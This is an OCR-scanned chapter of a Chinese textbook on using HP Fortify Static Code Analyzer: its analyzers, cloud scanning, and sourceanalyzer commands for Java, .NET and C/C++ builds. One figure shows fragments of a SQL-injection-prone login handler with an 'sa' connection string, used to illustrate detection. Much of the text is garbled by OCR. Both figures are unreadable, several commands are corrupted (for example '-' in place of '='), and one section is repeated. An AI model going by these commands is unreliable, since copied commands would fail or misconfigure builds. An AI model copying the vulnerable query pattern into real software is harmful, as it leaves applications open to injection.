分 析 器 包含 多 种 规则 类 型 (每 个 规则 类 型 匹配 一 个 分 析 器 ， 并 且 有 其 独立 的 语法 ) ; 
安全 编码 规则 包 ( 一 系列 包含 规则 的 文件 ) 。 

HP Fortify SCA 包括 6 个 主要 分 析 器 ， 下 面 介绍 主要 分 析 器 的 作用 和 简单 示例 。 
1) 数据 流 主要 作用 (如 图 5-22 所 示 ): 

查找 漏洞 ， 其 中 不 受信 任 的 输入 可 能 会 控制 应 用 程序 的 操作 ; 

e 分 析 器 采用 全 球 漏洞 传播 技术 对 非 信任 的 数据 流 进行 追踪 。 


Connection co 
try {. 


} 
catch (soLException err) { 
err.printStackTrace (); 
} 


} 


图 5-22 数据 流 示例 
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2) 控制 流 主 要 作用 (如 图 5-23 所 示 ): 


private void œndLogin Click(object sender, System.EventArgs e){ 
Label null; 


sque txtPassword"]; 
tabase-northwind;uid-sa;pwd-;"; 
en( ; 


AND Password- 


= new 'ommand (s: EE Les rns arr a 
3 Gd) a pd to ^9 [Vulnerabili poss | a: 
ty Reported" !, Variable 


if (intRecs > O)( l į initialized& | 
1 assigned | 
"E S07 1----- 
elset 
lblMsg.Text = "Login attempt failed."; 
i 
EAD. {EySSRYiRN .SSH Control Flow observes ! 
y iosas Basnensa.lHxksisir.StackTrace.ToString()); L all possible paths | 
ooo inni | Analyze until cnx | 


图 5-23 ”控制 流 示例 


。 检测 操作 或 者 函数 调用 的 顺序 是 否 存 在 潜在 的 危险 ; 

。 控制 流 分 析 器 通过 对 源 代码 (NST 文件 ) 进 行 分 析 , 模拟 状态 转换 ， 从 而 确定 程序 运行 
状态 的 分 析 器 ; 

。 控制 流 规则 是 确定 程序 运行 状态 的 规则 包 。 


5.5 静态 代码 分 析 器 扫描 的 方式 


1) HP Fortify 扫描 向 导 

HP Fortify 扫描 向 导 是 一 个 实用 程序 ， 它 可 以 快速 轻松 地 准备 和 扫描 SCA 项 目 代码 。 扫 
描 向 导 能 够 运行 本 地 扫描 ， 如 果 正 在 使 用 HP Fortify 云 扫描 ， 在 处 理 器 密集 扫描 分 析 阶 段 ， 
云 计算 机 可 以 相互 分 担 压力 。 


2) HP Fortify 云 扫 描 

HP Fortify 云 扫描 可 以 帮助 使 用 HP Fortify 静态 代码 分 析 器 的 用 户 更 好 地 管理 资源 , 在 处 
理 器 密集 扫描 分 析 阶 段 ， 可 从 一 台 构 建 计算 机 外 载 处 理 器 ， 转 移 到 准备 好 的 云 计 算 机 上 。 

构建 机 器 上 转换 阶段 完成 后 ， 生 成 SCA 移动 建立 会 话 ， 云 扫描 将 它 转移 到 可 用 的 计算 
机 进行 扫描 。 除 了 释放 构建 的 机 器 ， 这 个 过 程 根据 需要 添加 更 多 的 资源 到 云端 ， 从 而 不 必 中 
断 构 建 过 程 ， 使 它 更 容易 扩展 系统 。 

此 外 ， 软 件 安全 中 心 的 用 户 可 以 直接 使 用 云 扫描 将 FPR 文件 输出 到 服务 器 。 
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5.6. 


5.6 静态 代码 分 析 器 转换 源 代码 


1 转换 阶段 
来 执行 第 一 个 分 析 阶段 ( 即 文件 转换 ) 的 基本 命令 行 语法 是 : 


sourceanalyzer -b «build id» ... 


转换 阶段 包含 一 次 或 多 次 使 用 sourceanalyzer 命令 调用 Fortify SCA 的 过 程 。 构 建 ID(-b 


<build-id>) 用 于 将 这 些 调用 过 程 绑 定 到 一 起 。 


随后 调用 sourceanalyzer 时 会 将 任何 新 指定 的 源 文件 或 配置 文件 添加 到 与 构建 ID 相关 


联 的 文件 列表 中 。 转 换 结束 时 ， 可 使 用 -show-build-wamings 指令 列 出 在 转换 过 程 中 遇 到 的 所 
有 警告 和 错误 ， 


ely 


sourceanalyzer -b «build id» -show-build-warnings 
要 查看 与 某 个 特定 构建 ID 相关 联 的 所 有 文件 ， 可 使 用 -show-files 指令 : 


sourceanalyzer -b «build id» -show-files 


下 面 将 介绍 如 何 转换 不 同类 型 的 源 代码 : 

。 转换 Java 源 代码 

。 转换 NET 源 代码 

e 转换 C 和 C++ 代码 

o 转换 ABAP/4 

。 转换 FLEX 

。 转换 移动 平台 代码 

e 转换 其 他 语言 ， 如 ColdFusion, Classic ASP 以 及 JavaScript 

1) SCA 移动 建立 会 话 (可 选 ) 

SCA 移动 建立 会 话 允 许 一 个 项 目 在 一 台 计算 机 上 翻译 并 在 另 一 台 计算 机 上 进行 分 析 。 当 
E 一 个 SCA 移动 建立 会 话 时 ， 生 成 一 个 mbs 包括 会 话 目 录 中 分 析 阶 段 所 需 的 文件 。 然 后 


将 .mbs 文件 转换 到 不 同 机 器 上 进行 分 析 。 


2) 如 何 创建 SCA 移动 建立 会 i 
在 转 义 完成 的 那 台 计算 机 上 ， 发 出 以 下 命令 来 生成 一 个 SCA 移动 建立 会 话 : 


sourceanalyzer -b «build id» -export-build-session <file.mbs> 
其 中 <file mbs> 是 分 配给 SCA 移动 建立 会 话 的 文件 名 。 


3) 如 何 引入 SCA 移动 建立 会 i 
一 旦 把 mbs 文件 移动 到 你 想 运行 分 析 的 机 器 上 ， 发 出 以 下 命令 : 
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Ssourceanalyzer -import-build-session «file.mbs» 


其 中 <file mbs> 是 SCA 移动 建立 会 话 名 称 。 
一 旦 你 已 经 导入 SCA 移动 建立 会 话 ， 你 就 准备 继续 进行 分 析 阶 段 。 


4) 分 析 阶 段 

本 主题 将 介绍 分 析 阶 段 所 用 的 语法 : 扫描 在 转换 过 程 中 创建 的 中 间 文 件 并 创建 分 析 结 果 
文件 。 分 析 阶 段 包 含 对 源 分 析 器 的 一 次 调用 ， 需 要 指定 构建 DD， 并 包含 -scan 指令 以 及 任 
何必 要 的 分 析 或 输出 选项 。 

注意 ; 默认 情况 下 ，Fortify SCA 会 包含 FPR 中 的 源 代码 。 

分 析 阶 段 所 用 的 基本 命令 行 语法 为 : 


sourceanalyzer -b <build id> -scan -f results.fpr 


为 了 一 次 运行 分 析 多 个 构建 ， 可 以 添加 额外 的 构建 命令 行 : 


sourceanalyzer-b«build idl»-b«build id2»-b«build id3>-scan-fresults.fpr 


为 了 一 次 运行 分 析 多 个 无 记录 构建 ， 可 以 添加 额外 的 构建 命令 行 : 


sourceanalyzer -b «build-idl» -b <build-id2> -b «build-id3» -auth-silent -scan 
-f results.fpr 


5) 对 转换 和 分 析 阶 段 的 验证 

Audit Workbench 的 “结果 认证 ”功能 可 用 于 检验 分 析 是 否 完成 。“ 结 果 认 证 ”可 显示 关 
于 FortifySCA 扫描 过 的 代码 的 具体 信息 ， 包 括 : 

。 ”扫描 的 文件 列表 ， 包 括 文件 大 小 和 时 间 戳 ; 

。 用 于 转换 的 Java 类 路 径 ; 

。 分析 使 用 的 规则 包 列表 ; 

* Fortify SCA 运行 时 设置 和 命令 行 参数 的 列表 ; 

。 在 转换 和 分 析 过 程 中 遇 到 的 问题 或 者 警告 的 列表 ; 

。 机 器 /平台 信息 。 


5.6.2 ”转换 Java 源 代码 


1. Java 命令 行 语法 
基本 的 Java 命令 行 语法 是 : 
sourceanalyzer -b <build id> -cp <classpath><file list> 


对 于 Java 代码 , Fortify SCA 既 可 模拟 编译 器 (这 可 能 有 利于 进行 构建 集成 ), 也 可 直接 接 
受 源 文件 ( 这 有 利于 进行 命令 行 扫描 )。 
要 让 Fortify SCA 模拟 编译 器 ， 可 输入 : 


sourceanalyzer -b «build id» javac [<compiler options>] 
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要 直接 向 Fortify SCA 传 文件 ， 可 输入 : 


sourceanalyzer -b <build id> -cp <classpath> [<compiler options>] \ 
<files>|<file specifiers> 


其 中 : 

<compiler options> 是 传 到 编译 器 的 选项 。 

-cp <classpath> 指 定 用 于 Java 源 代码 的 类 路 径 。 类 路 径 是 一 个 构建 目录 和 jar 文件 的 列表 。 
格式 与 javac 正常 使 用 的 格式 相同 (使 用 冒号 或 分 号 分 隔 的 路 径 列 表 )。 可 使 用 Fortify SCA X 
件 说 明 符 。 


-cp "build/classes:lib/*.jar" 


注意 : 如 果 未 使 用 此 选项 指定 类 路 径 ， 系 统 将 使 用 CLASSPATH 环境 变量 。 

2. Java 命令 行 示例 

要 在 类 路 径 上 使 用 j2eejar 转换 单个 名 为 MyServletjava 的 文件 ， 可 输入 : 
sourceanalyzer -b MyServlet -cp lib/j2ee.jar MyServlet.java 

要 使 用 lib 目录 中 的 所 有 jar 文件 作为 类 路 径 来 转换 src 目录 中 的 所 有 java 文件 ,请 输入 : 
sourceanalyzer -b MyProject -cp "lib/*.jar" "src/**/*.java" 

要 在 运行 javac 编译 器 的 同时 转换 MyCode.java 文件 ， 可 输入 : 


Sourceanalyzer -b mybuild javac -classpath libs.jar MyCode.java 


3. 使 用 Fortity Ant Compiler Adapter 5j Ant 集成 


Fortify SCA 提供 了 一 个 Ant Compiler Adapter, 如果 项 目 使 用 Ant 构建 文件 , 则 可 以 用 它 
轻松 转换 Java 源 文件 。 这 种 集成 只 需要 设置 两 个 Ant 属性 , 并 且 不 必修 改 Ant build.xml 文件 ， 
通过 命令 行 即 可 完成 。 执 行 构建 时 ，Fortify SCA 会 拦截 所 有 的 javac 任务 调用 ， 并 在 Java 源 
文件 编译 完成 后 对 其 进行 转换 。 

注意 , 任何 JSP 文件 、 配置 文件 或 应 用 程序 中 包含 的 其 他 非 Java 源 文件 都 需要 在 一 个 单 
独 的 步骤 中 进行 转换 。 

要 使 用 Compiler Adapter， 需 要 执行 以 下 步 又; 

* sourceanalyzer 可 执行 文件 必须 在 系统 PATH 上 :; 

* sourceanalyzer jar (位 于 Core/lib 中 ) 必 须 在 Ant 的 类 路 径 上 ; 

* build.compiler 属性 必须 设置 为 com fortify.dev.ant SCACompiler; 

* sourceanalyzerbuildid 属性 必须 设置 为 构建 ID。 

以 下 示例 演示 了 如 何在 不 修改 构建 文件 的 情况 下 使 用 Compiler Adapter 运行 Ant 构建 : 

ant -Dbuild.compiler-com.fortify.dev.ant.SCACompiler \ 


-Dsourceanalyzer.buildid-MyBuild \ 
-lib «install dir»/Core/lib/sourceanalyzer.jar 
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ib 选项 只 适用 于 Ant 1.6 或 更 高 版 本 。 在 较 低 版 本 中 ， 必 须 设 置 CLASSPATH 环境 变 


量 ， 或 将 sourceanalyzerjar 复制 到 Ant 的 lib 目录 下 。 


在 Ant 1.6 或 更 高 版 本 中 ， 也 可 以 使 用 以 下 简单 命令 通过 Compiler Adapter 53217 Ant: 


sourceanalyzer -b «build-id» ant [ant-options] 


默认 情况 下 ， 系 统 会 为 Fortify SCA 分 配 600 MB 的 内 存 用 于 转换 。 使 月 
Adapter 时 ， 可 以 用 -DsourceanalyzermaxHeap 选项 来 增加 内 存 分 配 ， 如 下 所 示 : 


ant -Dbuild.compiler-com.fortify.dev.ant.SCACompiler 
-Dsourceanalyzer.buildid-MyBuild 

-lib «install directory»/Core/lib/sourceanalyzer.jar 
-Dsourceanalyzer.maxHeap-1000M 


4. 处 理 决议 警告 
在 构建 时 为 了 看 到 所 有 生成 的 敬告， 在 扫描 之 前 输入 以 下 命令 : 


sourceanalyzer -b <build id> -show-build-warnings 


5. Java 警告 


可 看 到 下 面 Java 的 警告 ; 

* Unable to resolve type... 

* Unable to resolve function... 

* Unable to resolve field... 

* Unable to locate import... 

* Unable to resolve symbol... 

* Multiple definitions found for function... 
* Multiple definitions found for class... 


Ant Compiler 


这 些 警 告 通常 是 由 于 缺少 资源 。 例 如 ， 一 些 构建 应 用 程序 所 需 的 jar 和 类 文件 没有 指定 。 


为 了 解决 上 述 警告 问题 ， 请 确保 包括 应 用 程序 将 用 到 的 所 有 必需 文件 已 正确 配置 。 
6. 使 用 FindBugs 


FindBugs (http:/findbugs.sourceforge neb 是 一 个 检测 Java 代码 质量 问题 的 静态 分 析 工 具 。 
可 将 FindBugs 与 Fortify SCA 一 起 使 用 ， 其 结果 会 被 合并 到 分 析 结 果 文件 中 。FindBugs 与 


Fortify SCA 的 不 同 之 处 在 于 ， 后 者 基于 Java 源 文件 运行 ， 而 前 者 基于 Java 字 节 码 运 行 。 
此 ， 运 行 项 目 分 析 之 前 ， 应 该 首先 编译 项 目 并 生成 类 文件 。 


因 


为 演示 如 何 自动 运行 FindBugs 与 Fortify SCA， 编 译 代码 示例 Warningjava， 如 下 所 示 : 


1) 切换 到 以 下 目录 : 


«install directory»/Samples/advanced/findbugs 
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2) 输入 以 下 命令 并 编译 示例 : 


mkdir build 
javac -d build Warning.java 


3) 用 FindBugs 和 Fortify SCA 扫描 该 示例 ， 如 下 所 示 : 


sourceanalyzer -b findbugs sample -java-build-dir build Warning.java 
sourceanalyzer -b findbugs sample -scan -findbugs -f 
findbugs sample.fpr 


4) 在 Audit Workbench 中 检查 分 析 结 果 : 


auditworkbench findbugs sample.fpr 


输出 包括 以 下 问题 类 别 : 

* Bad casts of Object References 

* Dead local store 

* Equal objects must have equal hashcodes 

* Object model violation 

* Unwritten field 

* Useless self-assignment 

如 果 按 分 析 器 分 组 ， 可 以 看 到 Fortify SCA 结构 分 析 器 产生 一 条 警告 ， 而 FindBugs 生成 
8 条 .由 Fortify SCA 生成 的 Object model violation 警告 与 由 FindBugs 生成 的 Equalobjects must 
have equal hash codes 警告 相似 。 此 外 ，FindBugs 还 会 产生 关于 相同 问题 的 两 组 警告 (Useless 
self-assignment 和 Dead local store). HNR RE Ee, 需要 通过 在 扫描 过 程 中 使 用 -filter 选项 
来 应 用 filtertxt 过 滤 文 件 。 注 意 ， 过 滤 并 不 十 分 精确 ， 因 为 每 个 工具 在 不 同 的 粒度 级 别 上 进 
行 过滤 。 为 演示 如 何 避 免 结果 重合 ， 使 用 filtertxt 扫描 示例 代码 ， 如 下 所 示 : 


sourceanalyzer -b findbugs sample -scan -findbugs -filter filter.txt 
-f findbugs sample.fpr 


7. 转换 J2EE 应 用 程序 


转换 J2EE 应 用 程序 需要 对 Java 源 文件 .2EE 组 件 (如 JSP 文件 )、 部 署 描述 符 ( 如 web.xml) 
以 及 配置 文件 (如 struts-config.xml) 进 行 分 析 。 

具体 步骤 包括 : 

1) 转换 Java 文件 。 

请 参考 本 章 前 面 提 到 的 示例 (Java 命令 行使 用 示例 )。 

2) 转换 JSP 文件 。 

3) 处 理 配置 文件 。 

示例 : 


sourceanalyzer -b my buildid "mydirectory/myfile.xml" 
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8. 转换 JSP 文件 


要 转换 ISP 文件 ，Fortify SCA 要 求 JSP 文件 采用 标准 的 Web Application Archive (WAR) 
布局 。 如 果 源 目录 已 经 采用 WAR 布局 进行 组 织 ， 那 么 可 以 直接 从 源 目 录 中 转换 JSP 文件 。 
如 果 不 是 这 种 情况 ， 那 么 需要 部 署 应 用 程序 并 从 部 署 目录 中 转换 JSP 文件。 

WIR JSP 文件 使 用 任何 标签 库 “ 例 如 JSTL” 请 确保 这 些 库 的 jar 文 件 位 于 WEB-INF/lib 
目录 中 。 否 则 JSP 编译 器 将 不 处 理 标签 库 ， 并 可 能 产生 错误 结果 。 

默认 情况 下 ，Fortify SCA 在 转换 阶段 会 使 用 某 个 版 本 的 Jasper JSP 编译 器 将 JSP 文件 编 
译 为 Java 文件 。 然 而 ， 如 果 Web 应 用 程序 是 专门 针对 某 个 应 用 程序 服务 器 而 开发 的 ， 那 么 
在 执行 转换 时 必须 使 用 该 应 用 服务 器 的 JSP 编译 器 。 

为 了 支持 此 操作 ，Fortify SCA 提供 了 以 下 命令 行 选项 : 

e -appserver 支持 的 值 : weblogic/websphere 


* -appserver-home 

* 对 于 Weblogic， 包 含 server/lib 子 目 录 的 目录 路 径 

* 对 于 WebSphere， 包 含 bin/JspBatchCompiler 脚本 的 目录 路 径 

-appserver-version. 支持 的 值 : 

e Weblogic 版 本 7、8、9 和 10 

© WebSphere 版 本 6 

如 果 使 用 的 应 用 程序 服务 器 不 属于 这 两 种 ， 请 使 用 默认 的 内 部 Fortify JSP 编译 器 。 
例如 : 

在 Ant 1.6 或 更 高 版 本 中 ， 也 可 以 使 用 以 下 简单 命令 通过 Compiler Adapter 来 运行 Ant: 


Sourceanalyzer -b «build-id» ant [ant-options] 


默认 情况 下 ， 系 统 会 为 Fortify SCA 分 配 600MB 的 内 存 用 于 转换 。 使 用 Ant Compiler 
Adapter 时 ， 可 以 用 -DsourceanalyzermaxHeap 选项 来 增加 内 存 分 配 ， 如 下 所 示 : 

ant -Dbuild.compiler-com.fortify.dev.ant.SCACompiler 

-Dsourceanalyzer.buildid-MyBuild 


-lib «install directory»/Core/lib/sourceanalyzer.jar 
-Dsourceanalyzer.maxHeap-1000M 


5.6(3 ”转换 .NET 源 代码 


本 节 将 描述 如 何 使 用 Fortify SCA 转换 由 以 下 程序 构建 的 Microsoft Visual Studio .NET 
和 ASP NET 应 用 程序 : 

* NET 版 本 1.1 和 2.0 

* Visual Studio NET 版 本 2003 

* Visual Studio NET 版 本 2005 

Fortify SCA 基于 Microsoft 中 间 语 言 (MSIL) 运 行 , 因此 支持 所 有 编译 成 MSIL 的 NET id 
言 ， 包 括 C# 和 VB NET。 

包括 以 下 主题 : 
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e Visual Studio NET 

。 转换 简单 的 NET 应 用 程序 

o 转换 ASPNET 1.1(Visual Studio 版 本 2003) 项 目 

注意 : 分 析 NET 应 用 程序 最 简单 的 方法 是 ， 使 用 适用 于 Visual Studio 的 Fortify Secure 
Coding Plug-in， 可 自动 收集 有 关 项 目的 信息 。 

1. Visual Studio .NET 


如 果 使 用 Visual Studio NET 执行 构建 命令 行 ， 可 通过 调用 sourceanalyzer 来 封装 构建 命 
令 行 ， 从 而 轻松 地 集成 源 代码 分 析 。 为 此 ， 具 有 的 安全 编码 规则 包 必须 适用 于 当前 所 安装 的 
Visual Studio 版 本 。 

以 下 示例 显示 了 适用 于 Visual Studio .NET 的 命令 行 语法 : 


sourceanalyzer -b my buildid Samplel.sln /REBUILD debug 


它 在 Visual Studio 构建 的 所 有 文件 中 执行 转换 阶段 。 务 必 进 行 清除 或 重新 构建 ， 确 保 将 
所 有 文件 都 包含 在 内 。 然 后 就 可 以 执行 分 析 阶 段 了 ， 如 下 所 示 : 


sourceanalyzer -b my buildid -scan -f results.fpr 


2. 转换 简单 的 .NET 应 用 程序 


用 户 可 使 用 Fortify SCA 命令 行 界面 来 处 理 .NET 应 用 程序 。 

使 用 以 下 方法 之 一 为 应 用 程序 的 分 析 工 作 做 准备 : 

在 启用 “调试 ”配置 的 情况 下 执行 完整 的 项 目 重建 。 在 启用 调试 的 情况 下 编译 项 目 可 提 
fit Fortify SCA 显示 结果 所 需 的 信息 。 

获取 与 项 目 有 关 的 所 有 第 三 方 .dll 文件 、 项 目 输出 .dll 文件 和 相应 的 .pbd 文件 。 注 意 ， 如 
果 同 一 文件 夹 中 不 存在 相应 的 .pdb 文件 ，Fortify SCA 就 会 忽略 任何 作为 输入 变量 传送 的 .dll 
文件 。 因 此 ， 必 须 包 含 与 所 有 项 目 .dl 文件 对 应 的 所 有 .pdb 文件 。 

注意 : .pdb 文件 在 第 三 方 库 中 并 不 是 必要 的 。 

从 命令 行 运行 Fortify SCA 来 分 析 .NET 应 用 程序 ， 如 下 所 示 : 

对 于 Visual Studio.NET 版 本 2003， 输 入 : 


sourceanalyzer -vsversion 7.1 -b MyBuild 
-libdirs ProjOne/Lib;ProjTwo/Lib ProjOne/bin/Debug ProjTwo/bin/Debug 


其 中 : 

。 MyBuild 是 构建 标识 符 ; 

。 ProjOne/Lib;ProjTwo/Lib 是 用 分 号 分 隔 的 文件 或 DLL( 包 含 第 三 方 DLL) 路 径 列 表 ; 
* ProjOne/bin/Debug ProjTwo/bin/Debug 是 输出 文件 夹 。 

对 于 Visual Studio .NET 版 本 2005， 输 入 : 


sourceanalyzer -vsversion 8.0 -b MyBuild 
-libdirs ProjOne/Lib;ProjTwo/Lib ProjOne/bin/Debug ProjTwo/bin/Debug 
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其 中 : 

。 MyBuild 是 构建 标识 符 ; 

。 ProjOne/Lib;ProjTwo/Lib 是 用 分 号 分 隔 的 文件 或 DLL (包含 第 三 方 DLL) 路 径 列 表 ; 

* ProjOne/bin/Debug ProjTwo/bin/Debug 是 输出 文件 夹 。 

注意 : Fortify SCA 会 自动 获取 项 目 中 所 用 的 标准 NET DLL 文件 ， 因 此 命令 行 中 不 必 包 
含 这 些 文件 。 

如 果 项 目 很 大 ， 可 以 使 用 相同 的 构建 DD 对 每 个 输出 文件 夹 分 别 执行 转换 阶段 ， 如 下 所 示 : 

sourceanalyzer -vsversion «version number» -b «build id» 

-libdirs «paths»«folder 1» 


sourceanalyzer -vsversion «version number» -b «build id» 
-libdirs «paths»«folder n» 


其 中 : 

e <version_number> 既 可 以 是 7.1， 也 可 以 是 8.0; 

。 <build id> 是 构建 ID; 

e ”<paths> 是 带 有 第 三 方 DLL 文件 的 文件 夹 或 DLL 文件 路 径 的 列表 ,列表 中 的 各 项 内 
容 以 分 号 分 隔 ，<folder_1> 和 <folder_n> 是 输出 文件 夹 。 

注意 : Fortify SCA 需要 配合 正确 的 Visual Studio 版 本 ， 即 使 使 用 的 是 命令 行 界面 。 

3. 转换 ASP.NET 1.1 (Visual Studio 版 本 2003) 项 目 


如 上 所 述 ，Fortify SCA 基于 .NET 编译 器 所 生成 的 MSIL 运行 。 对 于 ASP NET 项 目 ， 
Web 组 件 ( 如 .aspx 文件 ) 需 要 先 编译 然后 再 分 析 。 然 而 , 目前 没有 针对 .aspx 文档 的 标准 编译 器 ， 
当 从 浏览 器 中 打开 它们 时 ，.NET 1.1 运行 时 会 自动 对 其 进行 编译 。 

为 辅助 .aspx 编译 阶段 ，Fortify Software 提供 了 一 个 简易 工具 ， 用 于 编译 项 目 中 的 所 
有 .aspx 文件 。 该 工具 在 Fortify 安装 目录 中 的 位 置 是 : 


\Tools\fortify aspnet compiler\fortify aspnet compiler.exe 


分 析 ASP NET 1.1 解决 方案 : 
1) 对 解决 方案 执行 完整 的 重新 构建 。 
2) 对 于 解决 方案 中 的 每 个 Web 项 目 ， 删 除 以 下 文件 夹 : 


SSYSTEMROOT%\Microsoft .NET\Framework\v]1 .1.4322\Temporary 
ASP.NETFiles\<web application name» 


3) 对 于 解决 方案 中 的 每 个 Web 项 目 ， 运 行 以 下 命令 : 


fortify aspnet compiler «url to the web site» 
«source root of the web project» 


其 中 : 
«url to the web site> 指 网 站 的 URL， 例 如 : 
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http://localhost/WebApp 

<source root of the web project^f& Web 项 目的 源 位 置 ， 例 如 : 

«VS project location>\WebApp 

4) 为 在 步骤 1 中 构建 的 DLL 执行 转换 阶段 。 键 入 以 下 命令 , KpitHWIggst ID 与 以 下 
步骤 中 的 相同 : 

sourceanalyzer -b «build id»"«VS project location>\**\*.dll" 

5) 对 Web 组 件 执行 转换 阶段 对 于 解决 方案 中 的 每 个 Web 项 目 , 请 在 调用 sourceanalyzer 
时 输入 以 下 命令 : 


sourceanalyzer -b «build id» 
S$SYSTEMROOT$MMicrosoft.NETNVFrameworkNvl.1.4322NVTemporary 
ASP.NETFiles\<web application name» 


6) 包含 配置 文件 和 现 有 的 任何 Microsoft T-SQL 源 文件 : 


sourceanalyzer -b «build id»"«solution root»V**V*.config" 
«"t-sqgl sSrc»XV**x*. sq" 


注意 : 如 果 使 用 的 是 Microsoft Visual Studio 安全 编码 包 ， 那 么 这 些 步 骤 都 将 自动 执行 。 
5.6.4 ”转换 C 和 C++ 代码 

本 章 将 介绍 如 何 使 用 Fortify SCA 来 转换 C 和 C++ 源 代码 以 进行 分 析 。 

1.C 和 C++ 命令 行 语法 

转换 一 个 文件 所 用 的 基本 命令 行 语法 是 : 

sourceanalyzer -b <build id><compiler> [<compiler options>] 


其 中 
<compiler> 是 在 项 目的 构建 扫描 过 程 中 使 用 到 的 编译 器 名 称 ， 如 gcc 或 cl。 
<compiler options> 是 传送 到 编译 器 通常 用 于 编译 文件 的 选项 。 
2.C 和 C++ 命令 行 示例 

以 下 是 一 个 简单 用 法 示例 : 

要 使 用 gcc. 编译 器 转换 一 个 名 为 helloworld.c 的 文件 ， 请 输入 : 
sourceanalyzer -b my buildid gcc helloworld.c 

注意 : 这 个 过 程 中 会 编译 文件 。 

3. 与 Make 集成 

可 以 使 用 以 下 任 一 方法 配合 使 用 Make 和 Fortify SCA: 

* ”使 用 Fortify Touchless Build Adapter 
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* 修改 Makefile 以 调用 Fortify SCA 
4. 使 用 Fortify Touchless Build Adapter 


使 用 Fortify Touchless Build Adapter 来 集成 makefiles， 请 运行 以 下 命令 : 

* sourceanalyzer -b <build id» touchless make 

* Fortify SCA 会 运行 make 命令 。 当 make 调用 了 任意 被 Fortify SCA 认为 是 编译 器 的 
命令 时 ，FortifySCA 就 会 处 理 该 命令 。 注 意 ，makefile 不 会 被 修改 。 

这 种 构建 集成 的 方法 并 不 局 限于 make。 任 何 执行 编译 器 处 理 的 构建 命令 都 适用 于 该 系 

统 ， 只 要 将 用 于 运行 构建 的 命令 奉 代 上 述 命令 中 的 make' 部 分 即 可 。 

注意 : 如 果 存 在 以 下 情况 ，Fortify touchless build adapter 会 表现 异常: 

。 构建 脚本 采用 绝对 路 径 调用 编译 器 ， 或 者 构建 脚本 重 写 了 可 执行 的 搜索 路 径 ; 

。 构建 脚本 未 创建 新 的 进程 来 运行 编译 器 。 许 多 Java 构建 工具 (包括 Ant) 都 以 这 种 方式 
运行 。 

5. 修改 makefile 以 调用 Fortify SCA 


要 修改 makefile 以 调用 Fortify SCA， 请 将 makefile 中 对 编译 器 、 存 档 文件 或 链接 的 调用 
替换 为 对 Fortify SCA 的 调用 。 这 些 工 具 通 常 在 makefile 的 一 个 特殊 变量 中 指定 ， 如 下 所 示 : 

CC=gcc 

CXX=g++ 

AR=ar 

该 步骤 可 简化 为 在 makefile 中 与 Fortify SCA 一 起 预先 计划 对 这 些 工 具 的 引用 以 及 相应 
的 选项 : 

CC=sourceanalyzer -b mybuild -c gcc 


CXX=sourceanalyzer -b mybuild -c g++ 
AR=sourceanalyzer -b mybuild -c ar 


6. 使 用 Fortify Build Monitor 


本 节 将 介绍 在 Windows 系统 上 进行 构建 的 过 程 中 ， 如 何 使 用 Fortify Build Monitor 自动 
扫描 C/C++ 项 目 并 查看 结果 。 其 中 示例 使 用 的 是 Fortify SCA. 随 附 的 项 目 范例 。 

* Fortify Build Monitor 概述 

Fortify Build Monitor 菜单 包含 表 5-2 所 示 的 选项 。 


表 5-2 Fortify Build Monitor 的 选项 


选 项 H — 
Monitor (监视 器 ) 启动 监视 。Build Monitor 会 拦截 并 转换 计算 机 上 的 下 一 个 构建 
Build Done (构建 完成 ) 在 构建 完成 后 停止 监视 
Scan (扫描 ) 扫描 在 构建 过 程 中 监视 的 代码 
Scan Settings (扫描 设置 ) 控制 规则 包 和 内 存 设置 
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( 续 表 ) 
选 项 描述 
Set Results Folder (设置 结果 文件 夹 ) 控制 Fortify SCA 输出 结果 的 位 置 
Stay on Top (始终 在 上 面 ) 使 Fortify Build Monitor 窗口 始终 位 于 其 他 窗口 之 上 
Minimize to Tray (最 小 化 到 任务 栏 中 ) — | 将 Fortify Build Monitor 显示 为 任务 栏 中 的 一 个 图 标 
Exit (退出 ) 关闭 Fortify Build Monitor 
在 窗口 下 方 区 域 显示 或 隐藏 消息 。 有 具体 的 消息 包括 扫描 消息 、 错 
Show Messages (显示 消息 ) 误 消 息 和 Monitor Driver 信息 。 可 以 单 击 窗口 底部 的 Detailed 
Messages (详细 消息 ) 
Help (帮助 ) 显示 联机 帮助 
Reset (FH) 将 Fortify Build Monitor 重 置 为 初始 状态 


。 配置 Fortify Build Monitor 

1) 设置 结果 文件 夹 

Fortify Build Monitor 将 结果 以 FPR 格式 输出 到 一 个 本 地 文件 夹 中 。 可 以 更 改 输出 文件 
夹 。Fortify Build Monitor 在 每 次 执行 扫描 后 会 覆盖 结果 。 这 些 结果 不 会 存档 。 

更 改 结果 文件 夹 的 步骤 : 

a) 选择 Action (操作 )， 再 选择 Set Results Folder (设置 结果 文件 夹 )。 

屏幕 上 将 显示 Browse for Folder (浏览 文件 夹 ) 对 话 框 。 

b) 选择 一 个 文件 来， 然后 单 击 OK (确定 )。 

Fortify Build Monitor 将 结果 输出 到 选 定 的 文件 夹 中 。 

2) 设置 Fortify SCA 扫描 选项 

Fortify Build Monitor 使 用 Fortify SCA 扫描 项 目 。 可 以 调整 以 下 扫描 设置 : 

Allocate memory( 分 配 内 存 ): 增加 或 减少 分 配给 Fortify SCA 的 内 存 ; 

Secure coding rulepacks and custom rulepacks( 安 全 编码 规则 包 和 自 定义 规则 包 ): 更 改 
FortifySCA 用 来 分 析 源 代码 的 规则 包 ; 

User (用 户 ): 仅 监 视 由 当前 用 户 执行 的 构建 。 

更 改 扫描 选项 的 步 又 : 

a) 选择 Action( 操 作 )， 再 选择 Scan Settings (扫描 设置 )。 

屏幕 上 将 显示 Fortify Build Monitor: Scan Settings (Fortify Build Monitor: 扫描 设置 ) 对 话 框 。 

b) 要 更 改 内 存 分 配 ， 请 选择 一 个 值 。 

注意 : 如 果 输 入 的 选项 无 效 ， 则 会 把 内 存 设置 为 无 限 大 。 

c) 要 添加 或 删除 规则 包 ， 请 单 击 Rulepacks (规则 包 )。 

d) 要 查看 Fortify SCA 命令 行 选项 ， 请 单 击 Preview (预览 )。 

e) 单 击 Done (完成 )。 

Fortify SCA 扫描 选项 完成 更 改 。 

。 监视 构建 
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对 于 Windows 平台 上 的 C/C++ 项 目 和 解决 方案 ，Fortify SCA 包含 Fortify Build Monitor, 
该 工具 包含 图 形 化 用 户 界面 ， 可 在 构建 过 程 中 自动 执行 分 析 。 

在 Windows 平台 上 分 析 C/C++ 源 代码 构建 的 步骤 ， 

a) 选择 “开始 ”然后 依次 选择 “所 有 程序 ?和 Fortify Software-Fortify SCA - Build Monitor. 

b) 单 击 Monitor (监视 器 )。 
当 监 视 器 启动 后 ， 会 显示 一 个 绿色 指示 灯 图 标 。 

c) 在 构建 环境 中 创建 完整 的 项 目 构建 。 

